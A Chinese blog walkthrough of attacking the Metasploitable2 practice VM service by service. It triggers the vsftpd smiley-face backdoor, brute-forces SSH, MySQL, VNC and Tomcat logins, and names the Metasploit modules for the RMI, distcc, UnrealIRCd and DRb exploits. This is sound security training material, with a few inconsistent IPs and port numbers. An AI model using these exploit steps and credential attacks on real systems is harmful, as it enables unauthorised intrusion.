看完这篇 教你玩转渗透测试靶机——Metasploitable2

最新推荐文章于 2024-05-12 16:45:07 发布
最新推荐文章于 2024-05-12 16:45:07 发布
阅读量7.5k 收藏 42
点赞数 3
分类专栏: java 后端 文章标签: 安全 web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67401746/article/details/123581452
版权
java 同时被 2 个专栏收录
267 篇文章 16 订阅
订阅专栏
后端
12 篇文章 1 订阅
订阅专栏

Metasploitable2渗透测试详解

Metasploitable2靶机介绍:

Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware。当虚拟系统启动之后,使用用户名:msfadmin 和密码msfadmin登陆 适用于学习网络安全新手学习

Metasploitable2靶机下载:

https://pan.baidu.com/s/1SE1xoRtXMsrj_34FJQXT2Q
提取码:810r

Metasploitable2靶机安装:

下载好了把安装包解压 然后试用VMware即可。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Metasploitable2靶机漏洞详解:

渗透机:kali IP :172.16.5.42 靶机IP :172.16.5.17
在这里插入图片描述
漏洞清单:

端口/服务

端口/服务

21 / 弱口令

445 / 已测试

22 / 弱口令

512 / rlogin

23 /弱口令

512 / rlogin

25 -

514 / rlogin

53 -

1099 / java_rmi_server

80 - php_cgi

154 msfable 后门

111 -

2049 / NFS共享漏洞

139 / smb

2121 -

3306 / 空密码

3632 / distcc_exec

5432 / postgresql

5900 / VNC

6000 -

6667 / unreal_ircd

6697 / unreal_ircd

8009

8180 / tomcat

8787 / drb_remote_codeexec

首先我们先看一下21端口,版本是2.3.4 可以想到笑脸漏洞后门 msf中利用脚本运行。
在这里插入图片描述
还可以使用手动激活后门漏洞,如果在发送的用户名后面加上 “:)”(笑脸符号),这个版本的后门会在6200端口上打开一个监听的shell。我们可以通过telnet确认或者通过metasploit上面的攻击模块自动攻击。

ftp 172.16.5.17 这里telnet也可以激活笑脸

账号随便输入一个 Root:)

Password:随便输入一个 已经创建好了后面6200后门端口

Nc连接:nc 172.16.5.17

22端口:直接暴力破解

Search  ssh_login       搜索模块

Use  auxiliary/scanner/ssh/ssh_login    使用模块

Set  RHOST 172.16.5.198    设置目标地址

Set   USER_FILE  /root/0.txt   设置用户字典路径

Set   PASS_FILE  /root/0.txt   设置字典密码路径

Set   THREADS   100   设置线程是100

Run  开跑

在这里插入图片描述
23端口(telnet):

还是老样子尝试暴力破解,用户名和密码为:msfadmin
在这里插入图片描述
使用netlnet登入:
在这里插入图片描述
80端口:这里的漏洞挺多的 访问一下phpinfo().php 发现了一个2012年的漏洞

server API 是CGI方式运行的,这个方式在PHP存在漏洞-Cgi参数注入
在这里插入图片描述在这里插入图片描述
139和445都是Smb服务类型,共享服务。

使用 use auxiliary/scanner/smb/smb_enumshares
在这里插入图片描述
在使用一个脚本:use auxiliary/admin/smb/samba_symlink_traversal
在这里插入图片描述
1099端口是一个Java反序列化命令执行漏洞,可以看到已经getshell

原理:Java RMI Server 的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致

使用:use exploit/multi/misc/java_rmi_server
在这里插入图片描述
设置好参数 然后执行 就会有一个会话 然后 切换会话即可。

1524端口:
在少数服务器上存在一个古老的令人惊讶的“ingreslock”后门,监听1524端口。在过去的十年里,它经常被用于入侵一个暴露的服务器。它的利用是如此简单。
在这里插入图片描述
3306数据库默认端口,既然运行远程连接,直接爆破,账号root密码为空然后登入

使用模块:use auxiliary/scanner/mysql/mysql_login
在这里插入图片描述
在这里插入图片描述
3632 distccd服务,远程命令执行漏洞,直接exp

使用模块:use exploit/unix/misc/distcc_exec

5432端口,postgresq爆破

5900端口vnc服务,vnc服务有两部分构成,一部分是服务,一个是客户端,我们进行爆破

使用模块爆破:use auxiliary/scanner/vnc/vnc_login

6667端口6697 IRC服务, IRC服务这个版本存在后门漏洞,直接exp后getshell

使用模块:use exploit/unix/irc/unreal_ircd_3281_backdoor

8180端口:暴力破解账号密码:tomcat;tomcat
在这里插入图片描述
8787端口drb服务,有个远程代码执行漏洞

使用模块:use exploit/linux/misc/drb_remote_codeexec

Metasploitable2靶机渗透总结:

自此大概的漏洞基本上都写了,此靶机漏洞适用于新手练习,有些漏洞可能没有被测试存在一些问题没有被发现或者挖掘,希望大家在学习技术的同时,遵守网络安全法,希望对大家有所帮助,自己要做的也更多,感谢大家支持!

m0_67401746
关注
  • 3
    点赞
  • 42
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
靶机渗透(五)——metasploitable2
qq_45751902的博客
04-29 5716
目录一、简介二、信息收集三、端口渗透6667-irc21弱口令 一、简介 metasploitable是一个Ubuntu-Linux虚拟机,用于测试常见漏洞。本质上是一个盒子中的渗透测试实验室,提供了执行渗透测试渗透研究的安全场所。 靶机下载地址 用户名是 :msfadmin 密码是: msfadmin 二、信息收集 nmap -sS 192.168.92.0/24 开放了好多端口 三、端口渗透 启动msf msfconsole 6667-irc 登录msf search irc 找到对应得
Metasploit 内网渗透二—— 实战渗透操作--感受渗透流程,具体做什么 -永恒之蓝漏洞
天下著书立传者,皆为我师
04-24 1121
渗透测试实战练习1——永恒之蓝漏洞(渗透攻击 Win7 主机并远程执行命令)以及mysql空密码扫描利用(获取mysql数据库中信息)
最新看这篇 渗透测试靶机vulnhub——My File Server 1,重磅
最新发布
2401_84563405的博客
05-12 317
这个靶机的类型也是第一次做,比较简单。网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化的资料的朋友,可以戳这里获取一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!一个人可以走的很快,但一群人才能走的更远!
渗透测试-Metasploitable2靶机
道阻且长,行则将至。
02-22 7863
靶机介绍 Metasploit框架 Metasploit是一个开源的渗透测试框架软件,也是一个逐步发展为成熟的漏洞研究与渗透代码开发平台,此外也将成为支持整个渗透测试过程的安全技术集成开发与应用环境。本文将使用Kali Linux虚拟机进行攻击演示,Kali虚拟机内置了MSF渗透框架和其他大量渗透测试工具。 Metasploitable2靶机 Metasploitable2 虚拟系统是一个特别制作...
MSF的使用与靶场安装
Cper的博客
10-22 1843
MSF的一些实操练习
Metasploitable2靶机漏洞渗透测试
末班车的博客
03-11 1819
Metasploitable2靶机漏洞发现与渗透测试
使用kali的medusa工具
qq_61861243的博客
12-12 965
使用kali的medusa工具
metasploitable2 默认用户名 msfadmin 默认密码 msfadmin
gRpc的博客
11-02 7257
metasploitable2 默认用户名 msfadmin 默认密码 msfadmin
渗透测试入门——渗透测试笔记
01-27
CMS同样能在网上找到许多漏洞,常用作渗透测试的练习靶机。根据提示,第1题要求找到咨询平台的管理员账号密码;第2题需要登录服务器后台,并插入木马,再用中国菜刀连接,继而找到在管理员桌面上的 flag文件;第3题...
2020最新渗透测试靶机和工具及
05-30
搜集的渗透测试的靶场,有Bwapp综合靶场练习 webug综合靶场练习 DVWA综合靶场练习 pikachu靶场练习 uploads文件练习 SQlilabs注入练习 ZVulDirll综合靶场,全部封装在虚拟机中,渗透工具封装在另一虚拟机中。
vulhub渗透测试靶机学习1
08-08
渗透测试靶机学习0x01 lampiao靶机准备环境靶机下载地址https://download.vulnhub.com/lampiao/Lampiao.zip
DC-4-Web渗透测试靶机
01-19
【DC-4-Web渗透测试靶机】是一个专门为网络安全专业人士设计的模拟环境,主要用于学习和实践Web渗透测试技术。在Web渗透测试中,目标是识别并利用网站应用程序的安全漏洞,以便于预防或修复这些漏洞,保护真实的网络...
metasploitable2靶机
雨泽网络工作室
08-16 4758
一、Metasploitable2简介 Metasploitable2虚拟系统是一个特别制作的ubuntu操作系统,本身设计目的是作为安全工具测试和演示常见漏洞攻击的环境。其中最重要的是可以用来作为MSF攻击用的靶机。 开放了很多的高危端口如21、23、445等,而且具有很多未打补丁的高危漏洞, 如Samba MS-RPC Shell命令注入漏洞等,而且对外开放了很多服务,并且数据库允许外联等。系统中的用户口令均为弱口令。系统搭载了DVWA、Mutillidae等Web漏洞演练平台。 使用方法
无线网络渗透测试系列学习(二) - 在VMware中搭建Metasploit靶机的详细步骤以及端口的简单了解
曾铎的博客
03-10 2567
这篇文章主要介绍了在VMware中搭建Metasploit 2靶机的过程,和对计算机网络中端口概念的简单了解,罗列常用端口,以便后期回顾,下一篇文章将会讲述网络扫描的基础技术。
Metasploitable2安装基础----搭建DVWA
weixin_55205599的博客
06-07 1697
最近发现Metasploitable2是靶机,可以直接用DVWA,不用自己用phpstudy搭建环境了(都怪我之前不知道这个靶机,本地搭建DVWA老不成功,其实是包下载的问题)注意:下载下来是zip,解压后用VMware打开;下载下来是VMware的,直接用VMWare打开Metasploitable.vmx文件即可。Metasploitable系统的默认账号密码:msfadmin;命令:sudo passwd root。注:0/24是固定的 24什么含义?密码:password。命令:su root。
Metasploitable2靶机渗透学习
m0_65712192的博客
05-19 6191
Metasploitable2靶机渗透学习
metasploitable2 漏洞合集学习
qq_43233085的博客
02-05 4350
metasploitable2 漏洞合集学习弱密码 Weak PasswordSamba MS-RPC Shell命令注入漏洞Vsftpd 源码包后门漏洞UnreallRCd 后门漏洞Java RMI SERVER 命令执行漏洞Root用户弱口令漏洞(SSH爆破)Distcc 后门漏洞PHP CGI 参数注入执行漏洞Druby 远程代码执行漏洞Ingreslock 后门漏洞Rlogin 后门漏洞 ...
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值